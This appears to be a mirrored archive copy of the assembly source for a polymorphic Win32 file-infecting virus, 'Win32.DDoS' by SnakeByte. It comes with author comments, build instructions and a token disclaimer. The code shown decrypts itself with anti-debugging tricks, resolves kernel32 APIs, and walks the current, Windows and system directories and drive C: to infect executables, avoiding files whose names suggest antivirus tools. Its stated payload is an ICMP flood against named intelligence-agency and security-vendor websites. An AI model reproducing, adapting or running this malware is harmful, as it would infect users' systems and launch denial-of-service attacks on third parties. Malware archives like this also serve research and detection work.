mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
2363 lines
73 KiB
NASM
2363 lines
73 KiB
NASM
|
;
|
||
|
; ***************************************************************************
|
||
|
; -----------------[ Win32.DDoS by SnakeByte { KryptoCrew } ]----------------
|
||
|
; ***************************************************************************
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
; Please note that it is illegal to spread viruses, so if you compile this
|
||
|
; code, just test it on a closed system and don't place it in the wild !
|
||
|
; I am not responsible for your actions .. as always ;)
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
; This is the first Windows Virus I've written so far, and some parts are from
|
||
|
; Win32.Aztec by Billy Beleceb, because at the time i wrote this thing, not everything
|
||
|
; was clear in my mind, as it is now, hope I can present you some better things from me
|
||
|
; in the future.
|
||
|
;
|
||
|
; This is also my first polymorphic virus ever ;) so don't expect too much from the
|
||
|
; poly engine. I did not understand much of the code from other poly engines, but
|
||
|
; now, after coding one on my own, I do, so I maybe can code a better one the next time ;)
|
||
|
;
|
||
|
; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ...
|
||
|
; and try to keep track that they don't look completely useless.
|
||
|
; I also use several ways to decrypt the virus ( xor, neg, not .. ) and
|
||
|
; several methods to do the loop. The size will always be in ECX and
|
||
|
; the start in ESI, but i use several methods to put the values inside
|
||
|
; the registers so there is nothing static.
|
||
|
; The only static thing left is the call to the polymorphic decryptor ;(
|
||
|
;
|
||
|
;
|
||
|
; I was just able to test this thing on a Win95 PC, so I don't know if it will
|
||
|
; work on other systems, but I think it will. Two friends made some tests under
|
||
|
; NT and 2k with a beta, and it worked, so I hope this final version will also do.
|
||
|
;
|
||
|
;
|
||
|
; It tries to get the 4 following API's:
|
||
|
;
|
||
|
; - Kernel32.dll <- the only one we really need to work, the others are for fun
|
||
|
;
|
||
|
; - Imagehlp.dll <- try to create a valid CRC for the PE-Header of infected files
|
||
|
; - Advapi32.dll <- get some data from the registry
|
||
|
; - Winsck32.dll <- Payload : Ping-flood a server
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
; What does this Virus do :
|
||
|
;
|
||
|
; - 1.st Generation infects just the current directory ( easier to infect just some files *eg* )
|
||
|
; - Get's API's with LoadLibraryA & GetProcAddress
|
||
|
; - Tries to load ImageHlp.dll to create checksums with the CheckSumMappedFile Function
|
||
|
; - Infects the current, the windows and the system directory and parses some
|
||
|
; random directory's on drive C:
|
||
|
; - Follows LNK - Files ( does not work with NT / 2k )
|
||
|
; - Removes and restores File-Attributes
|
||
|
; - Parses Drive C:, enters a folder with a chance of 1 to 3
|
||
|
; - Retrieves the Startmenue from registry and parses it ( follows LNK-Files there )
|
||
|
; - If everything runs well it will infect 100 files all over the disk
|
||
|
; - Generates a polymorph decryptor which will be used for all files infected in one run
|
||
|
; - Uses 2 layers of decryption ( 1st is poly, 2nd is harder to debug / emulate )
|
||
|
; - Does not infect files smaller than 40 kb
|
||
|
; - Will not infect files with AV, AN or DR in the filename
|
||
|
; - Payload is a icmp flood on one of these servers :
|
||
|
;
|
||
|
; Sunday = www.bundesnachrichtendienst.de
|
||
|
; Monday = French Secret Service ( dgse.citeweb.net )
|
||
|
; Tuesday = www.avp.com ( AV )
|
||
|
; Wednesday = www.lockdown2000.com
|
||
|
; Thursday = www.f-secure.com
|
||
|
; Friday = www.norton.com
|
||
|
; Saturday = www.zonelabs.com
|
||
|
;
|
||
|
; *# Please note that i choose these servers because I think they can #*
|
||
|
; *# handle such an attack, if any idiot would release this into the wild. #*
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
; To make this code working use TASM 5.0 and pewrsec.
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
; Thanks and greetz fly to these people:
|
||
|
;
|
||
|
; Billy Beleceb - Your Win32 VWG is just great ..
|
||
|
; ( you'll find some of your code [Win32.Aztec] here ;)
|
||
|
; Evul - Thanks for hosting my site at coderz.net
|
||
|
; Ciatrix - Hope you carry on your good work with VDAT !
|
||
|
; SnakeMan - Hope you get more entrys *g* --> http://altavirus.cjb.net
|
||
|
; PhilippP - Thanks for the thrilling test in 2k .. ;)
|
||
|
; BumbleBee - Still thinking of Sex ?
|
||
|
; diediedie - Thnx for demotivating me... :)
|
||
|
; asmodeus - nice beginner lesson in poly ;)
|
||
|
; darkman - just believe me: the question was stupid ;)
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
; ***************************************************************************
|
||
|
; ---------------------------[ Here we start ]-------------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
.586p
|
||
|
.model flat
|
||
|
jumps ; Jumps get calculated
|
||
|
; ( I know not good for optimizing.. )
|
||
|
.radix 16 ; All numbers are Hexadecimal
|
||
|
; I once searched for a forgotten 'h'
|
||
|
; 2 weeks until I found this bug.. :P
|
||
|
|
||
|
; some API's
|
||
|
extrn ExitProcess:PROC ; fake host for 1. Generation
|
||
|
|
||
|
extrn MessageBoxA:PROC ; For testing purposes ( no longer needed )
|
||
|
; but i needed it for error-detection *g*
|
||
|
; 'cause I am too stupid to work with softice.. :(
|
||
|
|
||
|
.data ; fake data for TASM
|
||
|
db ? ; otherwise TASM would not compile this
|
||
|
; we store all our data in the code
|
||
|
; section, that's why we need to use
|
||
|
; pewrsec after compiling, to set the
|
||
|
; code section flags to write !
|
||
|
|
||
|
; some constants I don't want to calculate on my own *g*
|
||
|
VirusSize equ (offset VirusEnd - offset Virus )
|
||
|
CryptSize equ (offset VirusEnd - offset CryptStart )
|
||
|
NoCrypt equ (offset CryptStart - offset Virus )
|
||
|
FirstLSize equ (offset VirusEnd - offset FirstLayerStart )
|
||
|
Buffersize equ (offset EndBufferData - offset VirusEnd )
|
||
|
|
||
|
FILETIME STRUC
|
||
|
FT_dwLowDateTime dd ?
|
||
|
FT_dwHighDateTime dd ?
|
||
|
FILETIME ENDS
|
||
|
|
||
|
.code
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -------------[ Delta Offset and searching for the Kernel Addy ]------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
Virus: ; Here we go
|
||
|
|
||
|
call PDecrypt ; call the poly decryption routine
|
||
|
; which is located at the end of virus
|
||
|
; just a simple 'ret' in the first generation
|
||
|
|
||
|
FirstLayerStart: ; here starts the first layer
|
||
|
; everything will be crypted from here on
|
||
|
|
||
|
call Delta ; let's get the delta - offset
|
||
|
|
||
|
Delta:
|
||
|
mov ebp, offset Delta ; I want to do this a bit different
|
||
|
neg ebp ; than usual, who knows, maybe this
|
||
|
pop eax ; fools some bad heuristics
|
||
|
add ebp, eax
|
||
|
|
||
|
or ebp, ebp ; we don't need to decrypt the 1.
|
||
|
jz CryptStart ; Generation
|
||
|
|
||
|
; save esp
|
||
|
mov dword ptr [ebp+XESP], esp
|
||
|
|
||
|
|
||
|
mov ecx, (CryptSize / 2) ; the lenght of crypted part in words
|
||
|
mov dx, word ptr [ebp+Key]
|
||
|
lea esp, [ebp+CryptStart] ; set esp to the start of the decrypted part
|
||
|
|
||
|
DeCryptLoop: ; let's decrypt the virus
|
||
|
pop ax ; we pop the body word by word
|
||
|
inc dx ; this method fucks with debuggers, who
|
||
|
xchg dl, dh ; trace with int 1h ( destroys stack )
|
||
|
xchg al, ah
|
||
|
xor ax, dx
|
||
|
not ax
|
||
|
push ax
|
||
|
add esp, 2h
|
||
|
loop DeCryptLoop
|
||
|
; restore esp
|
||
|
mov esp, dword ptr [ebp+XESP]
|
||
|
|
||
|
jmp CryptStart ; start virus
|
||
|
|
||
|
Key dw 0h ; our key
|
||
|
XESP dd 0h ; we save the esp here
|
||
|
|
||
|
db 4 dup (90h) ; some nop's so we will not jump into a instruction
|
||
|
; ( happened sometimes during testing :( )
|
||
|
; because of the prefech queue buffer ( or whatever this is spelled .. )
|
||
|
CryptStart:
|
||
|
; we save these two values ( EIP & Imagebase )
|
||
|
; to be able to return to the original host..
|
||
|
mov eax, dword ptr [ebp+OldEIP]
|
||
|
mov dword ptr [ebp+retEIP], eax
|
||
|
mov eax, dword ptr [ebp+OldBase]
|
||
|
mov dword ptr [ebp+retBas], eax
|
||
|
|
||
|
mov eax, dword ptr fs:[0] ; save the original SEH
|
||
|
mov dword ptr [ebp+SEH_Save], eax
|
||
|
|
||
|
mov esi, [esp] ; let's get the return address of the Create Process API
|
||
|
xor si, si ; round it to a full page
|
||
|
|
||
|
push dword ptr [ebp+Error_ExecuteHost]
|
||
|
mov fs:[0], esp ; set new SEH
|
||
|
|
||
|
call GetKernel ; try to get it
|
||
|
jnc GetApis ; If got it we try to retrieve the API's
|
||
|
|
||
|
; Otherwise, we try to check for
|
||
|
; the kernel at some fixed addresses
|
||
|
; But the way above should work most
|
||
|
; of the times.. :)
|
||
|
|
||
|
mov esi, 0BFF70000h ; try the Win95 Kernel Addy
|
||
|
call GetKernel
|
||
|
jnc GetApis
|
||
|
|
||
|
mov esi, 077F00000h ; try the WinNT Kernel Addy
|
||
|
call GetKernel
|
||
|
jnc GetApis
|
||
|
|
||
|
mov esi, 077e00000h ; try the Win2k Kernel Addy
|
||
|
call GetKernel
|
||
|
jnc GetApis
|
||
|
; if we still did not found the
|
||
|
jmp Error_ExecuteHost ; kernel we stop the virus
|
||
|
; and execute the goat
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -------------------------[ let's get the API's ]---------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
; These are the 2 API's we search in the Kernel
|
||
|
; we need them to get all the others API's
|
||
|
; I prefer LoadLibraryA to GetModuleHandle,
|
||
|
; because it is no longer nessecairy, that the
|
||
|
; file we infect loads the dll files we need,
|
||
|
; we load them on our own,... ;)
|
||
|
; This means, we can use almost any API we want to *eg*
|
||
|
; LoadLibraryA also returns the Module-Handle, but
|
||
|
; if it is not loaded it loads it ... bla.. ;P
|
||
|
|
||
|
LL db 'LoadLibraryA', 0h ; we need these API's for searching..
|
||
|
GPA db 'GetProcAddress', 0h
|
||
|
|
||
|
GetApis: ; Offset of the Kernel32.dll PE-Header is in EAX
|
||
|
|
||
|
mov [ebp+KernelAddy], eax ; Save it
|
||
|
mov [ebp+MZAddy], ebx
|
||
|
|
||
|
lea edx, [ebp+LL] ; Points to name of the LoadLibaryA - API
|
||
|
mov ecx, 0Ch ; Lenght of Name
|
||
|
call SearchAPI1 ; search it..
|
||
|
mov [ebp+XLoadLibraryA], eax
|
||
|
; Save the Addy
|
||
|
|
||
|
xchg eax, ecx ; If we didn't get this API or the other one, we quit !
|
||
|
jecxz ExecuteHost ; thnx to Billy ;)
|
||
|
|
||
|
lea edx, [ebp+GPA] ; Points to name of the GetProcAddress - API
|
||
|
mov ecx, 0Eh ; Lenght of Name
|
||
|
call SearchAPI1
|
||
|
mov [ebp+XGetProcAddress], eax
|
||
|
; Save the Addy
|
||
|
|
||
|
xchg eax, ecx ; check if we failed
|
||
|
jecxz ExecuteHost ; ( thnx again, nice way of optimization *g* )
|
||
|
|
||
|
; Now we have our 2 nessecairy API's
|
||
|
jmp GetAPI2 ; and are able to get the others
|
||
|
; Yes I know this jmp is not very optimizing.. ;)
|
||
|
; But storing the data here helps me understanding
|
||
|
; my code *bg*
|
||
|
|
||
|
; this dll is delivered with every version
|
||
|
KERNEL32 db 'Kernel32',0 ; of windows, so we will get it always ( ..most likely *g* )
|
||
|
; the virus relies on it
|
||
|
|
||
|
IMAGEHLP db 'Imagehlp',0 ; this dll is not nessecairily needed, but dll's will
|
||
|
; only get infected, if we are able to use the CheckSumMappedFile
|
||
|
; Function from this dll to create a checksum
|
||
|
; it is delivered with win9x, NT and several compilers.
|
||
|
|
||
|
ADVAPI db 'advapi32',0 ; this dll is neccessairy to retrieve the startmenue folder
|
||
|
; from registry, so we are able to follow the shortcuts there
|
||
|
|
||
|
WSOCK db 'wsock32.dll',0
|
||
|
; we need this one here to perform a ping
|
||
|
; ( not needed for the virus, but the payload )
|
||
|
|
||
|
GetAPI2: ; We get them, by grabbing the handles of
|
||
|
; different DLL's first and use GetProcAddress
|
||
|
; to locate the API's itself
|
||
|
|
||
|
; Let's get the Handles by calling
|
||
|
; the LoadLibrary API.. :)
|
||
|
; if we fail to get the
|
||
|
; Kernel32, we execute the
|
||
|
; original host
|
||
|
|
||
|
lea eax, [ebp+KERNEL32]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XLoadLibraryA]
|
||
|
mov [ebp+K32Handle], eax
|
||
|
test eax, eax
|
||
|
jz ExecuteHost
|
||
|
|
||
|
lea eax, [ebp+IMAGEHLP]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XLoadLibraryA]
|
||
|
mov [ebp+IHLHandle], eax
|
||
|
|
||
|
lea eax, [ebp+ADVAPI]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XLoadLibraryA]
|
||
|
mov [ebp+ADVHandle], eax
|
||
|
|
||
|
lea eax, [ebp+WSOCK]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XLoadLibraryA]
|
||
|
mov [ebp+W32Handle], eax
|
||
|
|
||
|
|
||
|
lea esi, [ebp+Kernel32Names]
|
||
|
lea edi, [ebp+XFindFirstFileA]
|
||
|
mov ebx, [ebp+K32Handle]
|
||
|
push NumberOfKernel32APIS
|
||
|
pop ecx
|
||
|
call GetAPI3
|
||
|
|
||
|
lea esi, [ebp+ImageHLPNames]
|
||
|
lea edi, [ebp+XCheckSumMappedFile]
|
||
|
mov ebx, [ebp+IHLHandle]
|
||
|
xor ecx, ecx
|
||
|
inc ecx
|
||
|
call GetAPI3
|
||
|
|
||
|
lea esi, [ebp+ADVAPI32Names]
|
||
|
lea edi, [ebp+XRegOpenKeyExA]
|
||
|
mov ebx, [ebp+ADVHandle]
|
||
|
push 3d
|
||
|
pop ecx
|
||
|
call GetAPI3
|
||
|
|
||
|
|
||
|
lea esi, [ebp+WSOCK32Names]
|
||
|
lea edi, [ebp+Xsocket]
|
||
|
mov ebx, [ebp+W32Handle]
|
||
|
push 3d
|
||
|
pop ecx
|
||
|
call GetAPI3
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ------------------[ Outbreak ! Here we start infecting ]-------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
; Now we got everything we need to
|
||
|
; start infecting some files *eg*
|
||
|
; First of all we retrieve the
|
||
|
; foldernames of the current folder,
|
||
|
; the system folder, and the windows folder
|
||
|
; these are the folders we start to infect
|
||
|
lea edi, [ebp+curdir]
|
||
|
push edi
|
||
|
push 7Fh
|
||
|
call dword ptr [ebp+XGetCurrentDirectoryA]
|
||
|
|
||
|
|
||
|
call genPoly ; before we infect anything, we
|
||
|
; create a poly decryptor used for
|
||
|
; all files we infect = slow poly !
|
||
|
|
||
|
mov [ebp+InfCounter], 10d ; Number of files we want to infect !
|
||
|
call InfectCurDir ; first of all we infect the current directory
|
||
|
|
||
|
or ebp, ebp ; if this is the first generation, we infect just
|
||
|
jz ExecuteHost ; the first directory ( makes it easier to infect
|
||
|
; just some files .. *g*
|
||
|
; we also don't start the payload !
|
||
|
|
||
|
push 7Fh ; buffer - size
|
||
|
; 7fh = 127d = max lenght of Directory name
|
||
|
lea edi, [ebp+windir] ; Pointer to the offset where we save the directory
|
||
|
push edi
|
||
|
call dword ptr [ebp+XGetWindowsDirectoryA]
|
||
|
|
||
|
lea edi, [ebp+windir] ; then we infect the windows directory
|
||
|
push edi
|
||
|
call dword ptr [ebp+XSetCurrentDirectoryA]
|
||
|
mov [ebp+InfCounter], 10d
|
||
|
call InfectCurDir
|
||
|
|
||
|
; we save both directory's in the same buffer
|
||
|
push 7Fh ; so we save 127 Bytes of the Buffersize
|
||
|
lea edi, [ebp+windir]
|
||
|
push edi
|
||
|
call dword ptr [ebp+XGetSystemDirectoryA]
|
||
|
|
||
|
lea edi, [ebp+windir] ; and the system directory ..
|
||
|
push edi
|
||
|
call dword ptr [ebp+XSetCurrentDirectoryA]
|
||
|
mov [ebp+InfCounter], 10d
|
||
|
call InfectCurDir
|
||
|
|
||
|
; if everything went fine, we have
|
||
|
; infected now up to 30 files !
|
||
|
; Is this enough ?
|
||
|
; ( please note that this is a rhetorical question *g* )
|
||
|
; We want more !
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -----------------------[ Parse Directory's ]-------------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
InitParsing:
|
||
|
|
||
|
mov [ebp+InfCounter], 30d ; let's parse some directorys for
|
||
|
; 30 more files !
|
||
|
|
||
|
lea edi, [ebp+RootDir]
|
||
|
call dword ptr [ebp+XSetCurrentDirectoryA]
|
||
|
call ParseFolder
|
||
|
|
||
|
; if we are not able to access the registry we
|
||
|
; infect another 20 Files in the System-Directory
|
||
|
|
||
|
cmp dword ptr [ebp+XRegOpenKeyExA], 0h
|
||
|
je InfectWinDirAgain
|
||
|
call GetStartMenue ; last but not least, we try to parse the
|
||
|
; start-menue folder ( follow the LNK's )
|
||
|
; to get 20 more files
|
||
|
; with some luck, we infect 100 files each run
|
||
|
; all over the HD *g*
|
||
|
; I think this can be called successfull spreading *g*
|
||
|
lea edi, [ebp+windir]
|
||
|
call dword ptr [ebp+XSetCurrentDirectoryA]
|
||
|
|
||
|
InfectWinDirAgain:
|
||
|
mov [ebp+InfCounter], 20d
|
||
|
call ParseFolder ; let's parse the startmenue and follow all
|
||
|
; LNK-Files inside ;)
|
||
|
|
||
|
jmp PayLoad ; start the evil part of this thingie ..
|
||
|
|
||
|
|
||
|
ParseFolder:
|
||
|
call InfectCurDir ; infect the current directory
|
||
|
cmp [ebp+InfCounter],0
|
||
|
jbe EndParsing ; we infected enough ? ok, leave !
|
||
|
|
||
|
lea esi, [ebp+Folders]
|
||
|
Call FindFirstFileProc
|
||
|
inc eax
|
||
|
jz EndParsing ; If there are no directorys we return
|
||
|
dec eax ; otherwise we save the handle
|
||
|
|
||
|
GetOtherDir:
|
||
|
; first of all we check if this
|
||
|
; is a valid directory
|
||
|
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
|
||
|
and eax, 10h ; if not we get the next
|
||
|
jz NoThisOne ; one
|
||
|
|
||
|
lea esi, [ebp+WFD_szFileName]
|
||
|
cmp byte ptr [esi], '.' ; we will not parse into . or ..
|
||
|
je NoThisOne ; directorys
|
||
|
|
||
|
push 03h
|
||
|
pop ecx
|
||
|
call GetRand
|
||
|
|
||
|
dec edx ; if division-rest (edx) = 1
|
||
|
jz ParseNewDir ; we get this directory
|
||
|
|
||
|
NoThisOne:
|
||
|
|
||
|
call FindNextFileProc
|
||
|
|
||
|
test eax, eax
|
||
|
jnz GetOtherDir
|
||
|
|
||
|
EndParseDir2: ; we close the search - Handle
|
||
|
|
||
|
mov eax, dword ptr [ebp+FindHandle]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XFindClose]
|
||
|
|
||
|
EndParsing: ; we just return
|
||
|
ret
|
||
|
|
||
|
ParseNewDir: ; we got a direcory, let's change to it
|
||
|
; and infect it.. *eg*
|
||
|
mov eax, dword ptr [ebp+FindHandle]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XFindClose]
|
||
|
|
||
|
lea esi, [ebp+WFD_szFileName]
|
||
|
push esi
|
||
|
call dword ptr [ebp+XSetCurrentDirectoryA]
|
||
|
|
||
|
|
||
|
jmp ParseFolder
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -----------------[ Let's get the Startmenue folder ]-----------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
GetStartMenue: ; Let's try to open HKEY_USERS registry Key
|
||
|
|
||
|
lea esi, [ebp+RegHandle]
|
||
|
push esi
|
||
|
push 001F0000h ; complete access
|
||
|
push 0h ; reserved
|
||
|
lea esi, [ebp+SubKey]
|
||
|
push esi
|
||
|
push 80000003h ; HKEY_USERS
|
||
|
call dword ptr [ebp+XRegOpenKeyExA]
|
||
|
|
||
|
test eax, eax ; if we failed opening the key, we return
|
||
|
jnz NoStartMenue
|
||
|
|
||
|
; let's get the value
|
||
|
lea esi, [ebp+BufferSize]
|
||
|
push esi
|
||
|
lea esi, [ebp+windir]
|
||
|
push esi
|
||
|
lea esi, [ebp+ValueType]
|
||
|
push esi ; Type of Value
|
||
|
push 0 ; reserved
|
||
|
lea esi, [ebp+Value]
|
||
|
push esi ; ValueName
|
||
|
mov eax, [ebp+RegHandle]
|
||
|
push eax ; Reg-Key Handle
|
||
|
call dword ptr [ebp+XRegQueryValueExA]
|
||
|
|
||
|
mov eax, dword ptr [ebp+RegHandle]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XRegCloseKey]
|
||
|
|
||
|
NoStartMenue:
|
||
|
|
||
|
ret
|
||
|
|
||
|
SubKey db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
|
||
|
Value db 'Start Menu',0
|
||
|
ValueType dd 0h ; Type of registry Value
|
||
|
BufferSize dd 7Fh ; size of buffer
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ----------------[ API - Tables and some other data ]-----------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
; Misc Data .. ;)
|
||
|
Folders db '*.',0 ; search for directory's
|
||
|
RootDir db 'C:\',0 ; we want to start parsing at root of Drive C:
|
||
|
|
||
|
; Here follow the tables of the api's we use
|
||
|
; for our virus, if you want to know what they
|
||
|
; do exactly simply check the Win32
|
||
|
; Programmer's Reference
|
||
|
; I won't explain them ( I think the names of them
|
||
|
; makes it clear enough *g* )
|
||
|
|
||
|
Kernel32Names: ; 17d API's we want from Kernel32.dll
|
||
|
|
||
|
NumberOfKernel32APIS equ 17d
|
||
|
|
||
|
db 'FindFirstFileA', 0
|
||
|
db 'FindNextFileA', 0
|
||
|
db 'FindClose', 0
|
||
|
db 'CreateFileA', 0
|
||
|
db 'SetFileAttributesA', 0
|
||
|
db 'CloseHandle', 0
|
||
|
db 'CreateFileMappingA', 0
|
||
|
db 'MapViewOfFile', 0
|
||
|
db 'UnmapViewOfFile', 0
|
||
|
db 'GetWindowsDirectoryA', 0
|
||
|
db 'GetSystemDirectoryA', 0
|
||
|
db 'GetCurrentDirectoryA', 0
|
||
|
db 'SetCurrentDirectoryA', 0
|
||
|
db 'GetFileAttributesA', 0
|
||
|
db 'GetTickCount', 0
|
||
|
db 'CreateThread',0
|
||
|
db 'GetSystemTime',0
|
||
|
|
||
|
ImageHLPNames:
|
||
|
db 'CheckSumMappedFile', 0h
|
||
|
|
||
|
ADVAPI32Names:
|
||
|
db 'RegOpenKeyExA',0
|
||
|
db 'RegQueryValueExA',0
|
||
|
db 'RegCloseKey',0
|
||
|
|
||
|
WSOCK32Names:
|
||
|
db 'socket',0
|
||
|
db 'WSACleanup',0
|
||
|
db 'WSAStartup',0
|
||
|
db 'closesocket',0
|
||
|
db 'sendto',0
|
||
|
db 'setsockopt',0
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; --------------[ Retrieve API's with GetProcAddress ]-----------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
; esi points to the Table of Names
|
||
|
; edi to the offsets
|
||
|
; ebx contains the module-handle
|
||
|
; ecx the number of API's
|
||
|
GetAPI3:
|
||
|
push ecx ; save ecx
|
||
|
|
||
|
push esi ; push api-name
|
||
|
push ebx ; Push Module-Handle
|
||
|
; call GetProcAddress
|
||
|
|
||
|
call dword ptr [ebp+XGetProcAddress]
|
||
|
stosd ; store api-offset
|
||
|
|
||
|
pop ecx ; did we get them all ?
|
||
|
dec ecx
|
||
|
jz EndApi3 ; if yes then return
|
||
|
|
||
|
push ecx ; otherwise move esi to next API-Name
|
||
|
|
||
|
SearchZero: ; we search for the end of the current
|
||
|
cmp byte ptr [esi], 0h
|
||
|
je GotZero ; api name ( always 0h ) and increase
|
||
|
inc esi
|
||
|
jmp SearchZero
|
||
|
|
||
|
GotZero:
|
||
|
inc esi
|
||
|
pop ecx ; get ecx ( counter )
|
||
|
|
||
|
jmp GetAPI3 ; retrieve Next API
|
||
|
|
||
|
EndApi3:
|
||
|
ret
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; --------------[ Search Kernel Export Table for API's ]---------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
SearchAPI1: ; In this procedure we search for the first 2 API's
|
||
|
; clear the counter
|
||
|
and word ptr [ebp+counter], 0h
|
||
|
|
||
|
mov eax, [ebp+KernelAddy] ; Load the PE-Header Offset
|
||
|
|
||
|
mov esi, [eax+78h] ; Get Export Table Address
|
||
|
add esi, [ebp+MZAddy] ; normalize RVA
|
||
|
add esi, 1Ch ; skip not needed data
|
||
|
; now we gave the Address Table RVA-Offset in esi
|
||
|
|
||
|
lodsd ; Get Address Table RVA
|
||
|
add eax, [ebp+MZAddy] ; convert to VA and save it
|
||
|
mov dword ptr [ebp+ATableVA], eax
|
||
|
|
||
|
lodsd ; Get Name Pointer Table RVA
|
||
|
add eax, [ebp+MZAddy] ; make it VA and save it
|
||
|
mov dword ptr [ebp+NTableVA], eax
|
||
|
|
||
|
lodsd ; Get Ordinal Table RVA
|
||
|
add eax, [ebp+MZAddy] ; guess what ? *g*
|
||
|
mov dword ptr [ebp+OTableVA], eax
|
||
|
|
||
|
mov esi, [ebp+NTableVA] ; Get the Name Pointer Table Addy in esi
|
||
|
|
||
|
|
||
|
SearchNextApi1:
|
||
|
push esi ; Save Pointer Table
|
||
|
lodsd
|
||
|
add eax, [ebp+MZAddy] ; make it VA
|
||
|
|
||
|
mov esi, eax ; API Name in the Kernel Export API
|
||
|
mov edi, edx ; API we are looking for
|
||
|
push ecx ; save the size
|
||
|
|
||
|
cld ; Clear direction Flag
|
||
|
rep cmpsb ; Compare it
|
||
|
pop ecx
|
||
|
jz FoundApi1 ; Are they equal ?
|
||
|
|
||
|
pop esi ; Get the Pointer Table
|
||
|
add esi, 4h ; Set Pointer to the next api
|
||
|
inc word ptr [ebp+counter]
|
||
|
cmp word ptr [ebp+counter], 2000h
|
||
|
je NotFoundApi1
|
||
|
jmp SearchNextApi1 ; test next API
|
||
|
|
||
|
FoundApi1:
|
||
|
pop esi ; clear stack ( we don't want buffer overflows
|
||
|
; ok, we want them, but not here *bg* )
|
||
|
|
||
|
movzx eax, word ptr [ebp+counter]
|
||
|
shl eax, 1h ; multiply eax with 2
|
||
|
; Make eax Point to the right entry inside the
|
||
|
; Ordinal Table
|
||
|
add eax, dword ptr [ebp+OTableVA]
|
||
|
xor esi, esi ; clear esi
|
||
|
xchg eax, esi ; make esi point to the entry
|
||
|
lodsw ; get Ordinal in AX
|
||
|
shl eax, 2h ; eax * 4
|
||
|
add eax, dword ptr [ebp+ATableVA]
|
||
|
mov esi, eax ; esi points to the address RVA
|
||
|
lodsd ; eax = address RVA
|
||
|
add eax, [ebp+MZAddy] ; Make it VA
|
||
|
|
||
|
ret ; Return with API-Addy in eax
|
||
|
|
||
|
NotFoundApi1:
|
||
|
xor eax, eax ; We didn't find the API we need :(
|
||
|
ret ; We set EAX to 0 to show we have to
|
||
|
; return to the host..
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -------------------[ Execute the original Program ]------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
|
||
|
ExecuteHost: ; Here we execute the original program
|
||
|
|
||
|
lea edi, [ebp+curdir] ; we return to the original directory..
|
||
|
push edi
|
||
|
call dword ptr [ebp+XSetCurrentDirectoryA]
|
||
|
|
||
|
or ebp, ebp ; if this is a virus of the first generation
|
||
|
jz FirstGenHost ; we can't return to a host, so we
|
||
|
; stop this with ExitProcess..
|
||
|
Error_ExecuteHost:
|
||
|
mov eax, dword ptr [ebp+SEH_Save]
|
||
|
push eax
|
||
|
mov fs:[0], esp
|
||
|
|
||
|
|
||
|
mov eax,12345678h ; here we return to
|
||
|
org $-4 ; the old entry point
|
||
|
retEIP dd 0h ; of the infected file
|
||
|
|
||
|
add eax,12345678h
|
||
|
org $-4
|
||
|
retBas dd 0h
|
||
|
|
||
|
jmp eax
|
||
|
|
||
|
|
||
|
FirstGenHost:
|
||
|
push 0h ; Stop executing this stuff ( first Generation
|
||
|
call ExitProcess ; only )
|
||
|
|
||
|
|
||
|
OldEIP dd 0h ; Old Entry Point
|
||
|
OldBase dd 0h ; Old Imagebase
|
||
|
|
||
|
NewEIP dd 0h ; New Entry Point ( points to our virus.. )
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ----------------[ We try to find the Kernel Address ]----------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
GetKernel: ; Here we try to retrieve the Kernel
|
||
|
; set search range
|
||
|
mov byte ptr [ebp+K32Trys], 5h
|
||
|
|
||
|
GK1:
|
||
|
cmp byte ptr [ebp+K32Trys], 00h
|
||
|
jz NoKernel ; Did we pass our limit of 50 pages ?
|
||
|
|
||
|
call CheckMZSign ; Has this Page a DOS EXE-Header ?
|
||
|
jnc CheckPE
|
||
|
|
||
|
GK2:
|
||
|
sub esi, 10000h ; Get the next page
|
||
|
dec byte ptr [ebp+K32Trys]
|
||
|
jmp GK1 ; Check it
|
||
|
|
||
|
CheckPE: ; Let's check if we really found
|
||
|
mov edi, [esi+3Ch] ; the Kernel32.dll PE-Header
|
||
|
add edi, esi
|
||
|
call CheckPESign ; check for PE-Sign
|
||
|
|
||
|
jnc CheckDLL ; check for the DLL-Flag
|
||
|
jmp GK2
|
||
|
|
||
|
CheckDLL:
|
||
|
add edi, 16h ; check for the Dll-Flag
|
||
|
mov bx, word ptr [edi] ; get characteristics
|
||
|
and bx, 0F000h ; we need just the Dll-Flag
|
||
|
cmp bx, 02000h
|
||
|
jne GK2 ; if it is no dll go on searching
|
||
|
|
||
|
